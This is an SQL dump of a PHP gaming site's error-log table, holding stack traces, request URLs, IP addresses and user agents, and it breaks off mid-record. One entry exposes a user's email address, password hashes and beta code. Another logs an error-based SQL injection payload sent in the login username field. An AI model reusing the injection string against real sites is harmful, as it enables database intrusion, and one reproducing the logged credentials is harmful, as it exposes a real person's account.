\'inv_weapon_halbard_01.png\' found.', 'e01364920cd7cf9898513bef8afc9651ba8c21b4', 1, '/home/web/web/stable/mojotrollz/lib/system/files/files.php', 22, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_weapon_halb...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_weapon_halb...\')\n#2 /home/web/web/stable/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '119.159.92.152', 0.016, '2015-06-24 16:11:41', 'mojotrollz.eu', 80, '/api.php?call=files&cat=skilltree_skills&id=inv_weapon_halbard_01.png', 'a:0:{}', 'http://mojotrollz.eu/?t=1_050250210500140000_00000000000000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36', 0, b'0', 0, 5, 1, 0, '2015-09-09 07:47:22'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (949, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1435881600000', '6d29b38f4cc61be7a3c8655178ee7fa35b40f60b', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.78.169', 0.068, '2015-07-11 00:45:33', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1435881600000', 'a:0:{}', 'http://www.mojotrollz.eu/index.php?p=server&sub=chars&page=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:49:35'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (950, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1435968000000', '0ef5a514ef9b30e12d3e67375524d9f5bbc387ad', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.64.11', 0.048, '2015-08-01 00:07:14', 'www.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1435968000000', 'a:0:{}', 'http://www.mojotrollz.eu/index.php?p=server&sub=chars&page=3', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (951, 'ERROR', 'Character Data incomplete', '9befd81fb43ec3748b65e4eb5662d02fe050f541', 1, '/home/web/web/stable/mojotrollz/mojotrollz/api/beta/Security.php', 19, '#0 /home/web/web/stable/mojotrollz/mojotrollz/api/beta/api_mojotrollz_beta.php(4): Security::create(\'voidum\', \'f91fe3b85151aa8...\', \'correofaalso@ho...\', \'enUS\', false, true, \'129654477895\', \'d74fd58100ba937...\')\n#1 [internal function]: api_mojotrollz_beta::call_account_action_create(\'voidum\', \'f91fe3b85151aa8...\', \'correofaalso@ho...\', \'enUS\', \'129654477895\', \'d74fd58100ba937...\')\n#2 /home/web/web/stable/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#4 {main}', '87.222.149.88', 0.22801, '2015-09-07 16:03:01', 'mojotrollz.eu', 80, '/api.php?call=account&action=create&username=voidum&password_sha=f91fe3b85151aa845a66cd786667e0ca1dfea479&email=correofaalso@hotmail.com&locale=enUS&betacode=129654477895&wow_password=d74fd58100ba93720df0bf01362cfc5926a74523', 'a:0:{}', 'http://mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36', 0, b'0', 0, 8, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (952, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1438387200000', '67f4f9d5dbb9847429b32ff7aa175dae147e93ff', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.65.1', 0.024, '2015-08-03 22:52:23', 'mail.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1438387200000', 'a:0:{}', 'http://mail.mojotrollz.eu/index.php?p=server&sub=chars&page=3', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 1, 1, 0, '2015-09-09 07:49:31'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (953, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1438560000000', 'd938e25221191276468516d6f93db71609effb55', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.65.127', 0.052, '2015-08-25 12:17:28', 'mail.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1438560000000', 'a:0:{}', 'http://mail.mojotrollz.eu/index.php?p=server&sub=chars&page=3', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (954, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1441065600000', '16bf7653ac5ff1354fb926f6a6923e2b3480c864', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.78.206', 0.008, '2015-09-15 01:52:37', 'mail.mojotrollz.eu', 80, '/api.php?call=files&cat=sys&id=system.js&_=1441065600000', 'a:0:{}', 'http://mail.mojotrollz.eu/index.php?p=server&sub=chars&page=3', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 2, 0, 0, '2015-09-09 07:49:27'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (955, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'files\' found.', '008bafcb3788695a415a10d6b4c8c0d079bb2e2c', 1, '/home/web/web/test/mojotrollz/lib/system/files/files.php', 15, '#0 /home/web/web/test/mojotrollz/lib/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'files\', \'neopolimatrix.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'files\', \'neopolimatrix.p...\')\n#2 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/test/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.143.151', 0.016, '2015-09-07 06:39:07', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/api.php?call=files&cat=files&id=neopolimatrix.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/mojotrollz/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (956, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /api.php?call=files&cat=sys&id=system.js&_=1441152000000', '639c96dd39cfcead2b9ecf9f0b1d5c71015678fb', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '66.249.79.5', 0.004, '2015-09-27 12:24:09', 'hetzner.adiscon.com', 80, '/api.php?call=files&cat=sys&id=system.js&_=1441152000000', 'a:0:{}', 'http://hetzner.adiscon.com/index.php?p=server&sub=chars&page=17', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, b'0', 0, 5, 0, 0, '2015-09-09 07:49:38'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (957, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'footer.jpg\' found.', '45440f553679e97b3f749f42d624886b6c381476', 1, '/home/web/web/test/mojotrollz/lib/system/files/files.php', 22, '#0 /home/web/web/test/mojotrollz/lib/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'content\', \'footer.jpg\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'content\', \'footer.jpg\')\n#2 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/test/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.143.151', 0.044, '2015-09-09 06:44:11', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/api.php?call=files&cat=content&id=footer.jpg', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/mojotrollz/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 0, b'0', 0, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (958, 'SYSTEM\\LOG\\ERROR', 'SYSTEM\\DBD\\SYS_SAIMOD_TODO_COUNT failed causing: Prepared Statement prepare fail: Table \'host_mojotrollz.system_todo_assign\' doesn\'t exist', 'ce6705056068a34c6979a92a6224938d2ac6aeb6', 0, '/home/web/web/test/mojotrollz/lib/system/db/qq/QP.php', 20, '#0 /home/web/web/test/mojotrollz/lib/system/db/qq/QP.php(33): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#1 /home/web/web/test/mojotrollz/lib/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php(100): SYSTEM\\DB\\QP::Q1(Array)\n#2 /home/web/web/test/mojotrollz/lib/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php(53): SYSTEM\\SAI\\saimod_sys_todo::generate_list(0, \'all\', \'%\', 0)\n#3 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_todolist()\n#4 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/web/test/mojotrollz/lib/system/sai/sai/saigui.php(21): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#6 /home/web/web/test/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.143.151', 0.068, '2015-09-09 07:04:53', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=todolist', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 10, b'0', 0, 1, 1, 0, '2015-09-09 07:49:19'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (959, 'SYSTEM\\LOG\\ERROR', 'SYSTEM\\DBD\\SYS_SAIMOD_TODO_STATS_USERS failed causing: Could not query Database. Check ur Query Syntax or required Rights: Table \'host_mojotrollz.system_todo_assign\' doesn\'t exist', '29f90d5b3169ce0b46a01c2841dda951298306c7', 0, '/home/web/web/test/mojotrollz/lib/system/db/qq/QQ.php', 21, '#0 /home/web/web/test/mojotrollz/lib/system/sai/modules/saistart_sys_sai/saistart_sys_sai.php(41): SYSTEM\\DB\\QQ::QQ()\n#1 /home/web/web/test/mojotrollz/lib/system/sai/modules/saistart_sys_sai/saistart_sys_sai.php(6): SYSTEM\\SAI\\saistart_sys_sai::html_content()\n#2 [internal function]: SYSTEM\\SAI\\saistart_sys_sai::sai_mod__SYSTEM_SAI_saistart_sys_sai()\n#3 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/web/test/mojotrollz/lib/system/sai/sai/saigui.php(21): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#5 /home/web/web/test/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.143.151', 1.65606, '2015-09-09 07:04:55', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saistart_sys_sai', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 10, b'0', 0, 1, 1, 0, '2015-09-09 07:49:14'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (960, 'SYSTEM\\LOG\\WARNING', 'Texts with tag: sai_log - 11 ids not found for lang: deDE - fallback to default lang.', 'd7c230f5ea214b061ba20440b1458b6ec1eec2ec', 1, '/home/web/web/test/mojotrollz/lib/system/page/text.php', 26, '#0 /home/web/web/test/mojotrollz/lib/system/sai/modules/saimod_sys_log/saimod_sys_log.php(327): SYSTEM\\PAGE\\text::tag(\'sai_log\')\n#1 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_filter()\n#2 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/test/mojotrollz/lib/system/sai/sai/saigui.php(21): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#4 /home/web/web/test/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#5 {main}', '37.24.143.151', 1.97607, '2015-09-09 07:12:54', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=filter&&', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 10, b'0', 0, 7, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (961, 'SYSTEM\\LOG\\ERROR', 'SYSTEM\\DBD\\SYS_SAIMOD_TODO_LIST failed causing: Prepared Statement prepare fail: Unknown column \'todo.priority\' in \'field list\'', '720ad2e032e6ed5b8b19db4c612025cc9566e0b9', 0, '/home/web/web/test/mojotrollz/lib/system/db/qq/QP.php', 20, '#0 /home/web/web/test/mojotrollz/lib/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php(101): SYSTEM\\DB\\QP::QQ(Array)\n#1 /home/web/web/test/mojotrollz/lib/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php(53): SYSTEM\\SAI\\saimod_sys_todo::generate_list(0, \'all\', \'%\', 0)\n#2 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_todolist()\n#3 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/web/test/mojotrollz/lib/system/sai/sai/saigui.php(21): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#5 /home/web/web/test/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.143.151', 0.016, '2015-09-09 07:06:54', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=todolist&&', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 10, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (962, 'SYSTEM\\LOG\\ERROR', 'Class not found: wizard_start', '212ce220034416144323aa2dd0c8d349b91cb9f4', 1, '/home/web/web/test/mojotrollz/lib/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'wizard_start\')\n#1 [internal function]: spl_autoload_call(\'wizard_start\')\n#2 /home/web/web/test/mojotrollz/lib/system/page/State.php(32): class_exists(\'wizard_start\')\n#3 /home/web/web/test/mojotrollz/lib/system/api/api_system.php(16): SYSTEM\\PAGE\\State::get(\'1\', \'start\')\n#4 [internal function]: SYSTEM\\API\\api_system::call_pages(\'1\', \'start\')\n#5 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/web/test/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#7 {main}', '37.24.143.151', 0.008, '2015-09-09 10:12:10', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/api.php?call=pages&group=1&state=start', 'a:0:{}', 'http://www.mojotrollz.eu/web/test/mojotrollz/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 10, b'0', 0, 73, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (963, 'SYSTEM\\LOG\\ERROR', 'Class not found: LIB\\lib_unslider', '9b76d2691d4f01484b4590370a646116676e4576', 1, '/home/web/web/test/mojotrollz/lib/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'LIB\\\\lib_unslide...\')\n#1 /home/web/web/test/mojotrollz/mojotrollz/page/default_page/default_page.php(9): spl_autoload_call(\'LIB\\\\lib_unslide...\')\n#2 /home/web/web/test/mojotrollz/mojotrollz/page/default_page/default_page.php(27): default_page->js()\n#3 /home/web/web/test/mojotrollz/mojotrollz/page/page_mojotrollz.php(9): default_page->html(NULL)\n#4 [internal function]: page_mojotrollz::default_page()\n#5 /home/web/web/test/mojotrollz/lib/system/api/api.php(98): call_user_func(Array)\n#6 /home/web/web/test/mojotrollz/lib/system/api/api.php(23): SYSTEM\\API\\api::do_default(true, \'page_mojotrollz\')\n#7 /home/web/web/test/mojotrollz/index.php(13): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, true, true)\n#8 {main}', '37.24.143.151', 0.008, '2015-09-09 09:46:30', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 10, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (964, 'SYSTEM\\LOG\\ERROR', 'SYSTEM\\DBD\\INSTALL_SAI failed causing: Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `nam\' at line 4', '3d2de4f0906681d10fbfbaaf060616997ee83d3c', 0, '/home/web/web/test/mojotrollz/lib/system/db/qq/QT.php', 20, '#0 /home/web/web/test/mojotrollz/mojotrollz/page/page_mojotrollz.php(15): SYSTEM\\DB\\QT::QT()\n#1 [internal function]: page_mojotrollz::page_install()\n#2 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/test/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, true, true)\n#4 {main}', '37.24.143.151', 0.008, '2015-09-09 10:24:49', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/?page=install', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 10, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (965, 'SYSTEM\\LOG\\ERROR', 'SYSTEM\\DBD\\INSTALL_SAI failed causing: Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `nam\' at line 2', '023f002eb42c1d4faad7c365d05e03e2a1e3f75b', 0, '/home/web/web/test/mojotrollz/lib/system/db/qq/QT.php', 20, '#0 /home/web/web/test/mojotrollz/mojotrollz/page/page_mojotrollz.php(15): SYSTEM\\DB\\QT::QT()\n#1 [internal function]: page_mojotrollz::page_install()\n#2 /home/web/web/test/mojotrollz/lib/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/web/test/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, true, true)\n#4 {main}', '37.24.143.151', 0.016, '2015-09-09 22:57:46', 'www.mojotrollz.eu', 80, '/web/test/mojotrollz/?page=install', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13 Safari/537.36', 0, b'0', 0, 3, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (966, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 8; statics: 0; req_command: 2; req_param: 3; opt_param: 0; url: /api.php?call=account&action=login&username=%27and(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(database()))%20FROM%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)--+-&pass=fubar&action=login&x=0&y=0&password_sha=e93b4e3c464ffd51732fbd6ded717e9efda28aad&password_md5=5d793fc5b00a2348c3fb9ab59e5ca98a', '09c009383237d0336f128a41a321940b0b556e09', 1, '/home/web/web/stable/mojotrollz/lib/system/api/api.php', 107, '#0 /home/web/web/stable/mojotrollz/lib/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/web/stable/mojotrollz/api.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '93.115.87.78', 0.004, '2015-09-12 22:56:50', 'www.mojotrollz.eu', 80, '/api.php?call=account&action=login&username=%27and(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(database()))%20FROM%20information_schema.tables%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)', 'a:0:{}', 